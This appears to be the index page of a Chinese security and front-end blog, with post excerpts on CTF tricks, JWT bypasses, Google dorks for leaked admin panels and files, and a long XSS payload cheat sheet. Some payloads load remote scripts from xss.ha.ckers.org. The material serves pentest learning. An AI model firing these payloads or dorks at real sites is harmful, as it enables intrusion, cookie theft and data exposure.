无星的渗透之旅速成篇(十四)-Root安卓机抓包 发表于 2025-07-22 更新于 2025-10-15 分类于 安全 阅读次数: 本文字数: 973 阅读时长 ≈ 1 分钟 想看吗?猜猜密码是多少. 阅读全文 »
无星的安全之旅(十)——PHP 发表于 2025-06-30 更新于 2025-10-15 分类于 安全 阅读次数: 本文字数: 223 阅读时长 ≈ 1 分钟 is_numeric比对是否是数字或者数字字符串 ==弱比较 12345$num=$_GET['num'];if(!is_numeric($num)){ echo $num; if($num==1) echo 'flag{**********}';} 比较数字,竟然只比较数字 $num=1a的情况下,比到1=1就停了 即 会截取字符串开头连续的数字部分 离谱 阅读全文 »
赣银杯赛前培训 发表于 2025-06-14 更新于 2025-10-15 分类于 安全 阅读次数: 本文字数: 5.3k 阅读时长 ≈ 5 分钟 WEB信息收集、爆破、认证1.敏感文件泄露 a.robots.txt b.www.zip c./.git 2.dirsearch\dirb\3.BURP a.登录框->admin密码【登录获取flag】 b.给一个字典,爆出普通用户密码,登录后,有些权限验证方法 c.Cookie->user改为admin d.JWT验证 i.修改算法 ii.算法改为None,none iii.爆破密钥 iv.删除signature,删除签名 命令执行 1.成因 阅读全文 »
无星的自动化之旅(七)——PlayWright加载插件 发表于 2025-06-08 更新于 2025-10-15 分类于 PlayWright 阅读次数: 本文字数: 1.9k 阅读时长 ≈ 2 分钟 背景使用playwright启动的是为一个无痕浏览器 但是我们有时候需要包含一些浏览器拓展 如何找到拓展安装地址我这里以Edge为例,其他浏览器自己搜 1C:\Users\user_name\AppData\Local\Microsoft\Edge\User Data\Default\Extensions 所有插件都在其中 可以根据拓展中展示的插件id知道插件名称 使用说明在当前项目下新建一个extensions文件夹 阅读全文 »
无星的前端之旅(三十四)——verdaccio解决内网依赖.md 发表于 2025-05-27 更新于 2025-10-15 分类于 前端 阅读次数: 本文字数: 2k 阅读时长 ≈ 2 分钟 背景前面使用playwright时,就谈过这个内网依赖的问题,今天我将使用究极模式来解决这个问题 环境一台内网机,一台外网机 内网机有node和npm 1.自建私服使用verdaccio,这个大家应该都不陌生 接下来,我会告诉你如何搭建一个私服,并让它可用 因为考虑到我们是需要迁移到内网,所以我们拒绝全局安装 这里我们不考虑什么打包tgz的方式 阅读全文 »
无星的渗透之旅速成篇(十三)-Burp参数加解密 发表于 2025-05-18 更新于 2025-10-15 分类于 安全 阅读次数: 本文字数: 8.3k 阅读时长 ≈ 8 分钟 背景在渗透过程中,经常会遇到参数和返回值加密的情况 比如 请求 和 返回如下 那么我们如何找寻加密方式和明文参数呢1. 代码审计打开F12通过搜索查找接口所在代码位置 自己添加一行打印并保存,就能看到明文参数 阅读全文 »
无星的渗透之旅速成篇(十二)-sourcemap和.git 发表于 2025-05-17 更新于 2025-10-15 分类于 安全 阅读次数: 本文字数: 406 阅读时长 ≈ 1 分钟 sourcemap1.判断是否存在sourcemapF12打开工具栏查看是否存在webpack 2.下载map打开static文件夹,复制js文件的路径 例如 https://xxxxg/static/js/app.22a24d56f6000aff1358.js 在最后添加.map 并新增下载链接 阅读全文 »
Edu汇总 发表于 2025-05-03 更新于 2025-10-15 分类于 渗透 阅读次数: 本文字数: 1.5k 阅读时长 ≈ 1 分钟 1.信息泄露搜索语法搜索语法生成工具 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748管理后台地址:site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | systemsite:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backendsite:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录上传类漏洞地址:site:target.com inurl:file | inurl:upload注入页面:site:target.com inurl:?id= | inurl:php?id= | inurl:jsp?id= | inurl:aspx?id= | inurl:asp?id=编辑器页面:site:target.com inurl:ewebeditor目录遍历漏洞:site:target.com intitle: "index of"URL 跳转:site:target.com inurl:url= | inurl:return= | inurl:next= | inurl:redir= inurl:httpSQL错误:site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:”Warning: mysql_query()" | intext:"Warning: pg_connect()"phpinfo:site:target.com ext:php intitle:phpinfo "published by the PHP Group"配置文件泄露:site:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini数据库文件泄露:site:target.com ext:.sql | .dbf | .mdb | .db日志文件泄露:site:target.com ext:.log备份和历史文件泄露:site:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar公开文件泄露:site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv邮箱信息:site:target.com intext:@target.comsite:target.com 邮件site:target.com email社工信息:site:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证 阅读全文 »
NTP服务器同步 发表于 2025-04-27 更新于 2025-10-15 分类于 ntp 阅读次数: 本文字数: 170 阅读时长 ≈ 1 分钟 背景烦的一比,Windows的时间和准确时间差的太远了 但是又无法同步 试了N多个ntp服务器了,一直都提示 1Windows在与ntp.ntsc.ac.cn进行同步时出错。由于超时时间已过,该操作返回。 什么aliyun,tencent之类的服务器都试过 全都超时 找了个可用的ntp服务器ntp 阿星严选:CN.NTP.ORG.CN 阅读全文 »
XSS-常用记录 发表于 2025-04-21 更新于 2025-10-15 分类于 安全 阅读次数: 本文字数: 5.9k 阅读时长 ≈ 5 分钟 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148<script>alert('XSS')</script>"><script>alert('XSS')</script><"<svg onload=alert('XSS')><!-- 使用<a>标签 --><a href="javascript:alert('XSS')">点击我</a><!-- 使用<img>标签 --><img src="x" onerror="alert('XSS')"><!-- 使用<iframe>标签 --><iframe src="javascript:alert('XSS')"></iframe><!-- 使用<button>标签 --><button onclick="alert('XSS')">点击我</button><!-- 使用<input>标签 --><input type="button" onclick="alert('XSS')" value="点击我"><!-- URL编码 --><a href="javascript:%61%6C%65%72%74%28%31%29">点击我</a><!-- JavaScript Unicode编码 --><script>alert('\u0058\u0053\u0053')</script>>"'><img src="javascript.:alert('XSS')">>"'><script>alert('XSS')</script><table background='javascript.:alert(([code])'></table><object type=text/html data='javascript.:alert(([code]);'></object>"+alert('XSS')+"'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerable)</script><script>alert('XSS')</script><img src="javascript:alert('XSS')">%0a%0a<script>alert(\"Vulnerable\")</script>.jsp%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3cscript%3ealert(%22xss%22)%3c/script%3e/index.htmla.jsp/<script>alert('Vulnerable')</script>"><script>alert('Vulnerable')</script><IMG SRC="javascript.:alert('XSS');"><IMG src="/javascript.:alert"('XSS')><IMG src="/JaVaScRiPt.:alert"('XSS')><IMG src="/JaVaScRiPt.:alert"("XSS")><IMG SRC="jav	ascript.:alert('XSS');"><IMG SRC="jav
ascript.:alert('XSS');"><IMG SRC="jav
ascript.:alert('XSS');">"<IMG src="/java"\0script.:alert(\"XSS\")>";'>out<IMG SRC=" javascript.:alert('XSS');"><SCRIPT>a=/XSS/alert(a.source)</SCRIPT><BODY BACKGROUND="javascript.:alert('XSS')"><BODY ONLOAD=alert('XSS')><IMG DYNSRC="javascript.:alert('XSS')"><IMG LOWSRC="javascript.:alert('XSS')"><BGSOUND SRC="javascript.:alert('XSS');"><br size="&{alert('XSS')}"><LAYER SRC="http://xss.ha.ckers.org/a.js"></layer><LINK REL="stylesheet"HREF="javascript.:alert('XSS');"><IMG SRC='vbscript.:msgbox("XSS")'><META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');"><IFRAME. src="/javascript.:alert"('XSS')></IFRAME><FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET><TABLE BACKGROUND="javascript.:alert('XSS')"><DIV STYLE="background-image: url(javascript.:alert('XSS'))"><DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"><DIV STYLE="width: expression(alert('XSS'));"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE='xss:expre\ssion(alert("XSS"))'><STYLE. TYPE="text/javascript">alert('XSS');</STYLE><STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE><BASE HREF="javascript.:alert('XSS');//">getURL("javascript.:alert('XSS')")a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);<XML SRC="javascript.:alert('XSS');">"> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"<SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT><IMG SRC="javascript.:alert('XSS')"<SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT><A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A> Xss平台例如:https://xssjs.com/ 阅读全文 »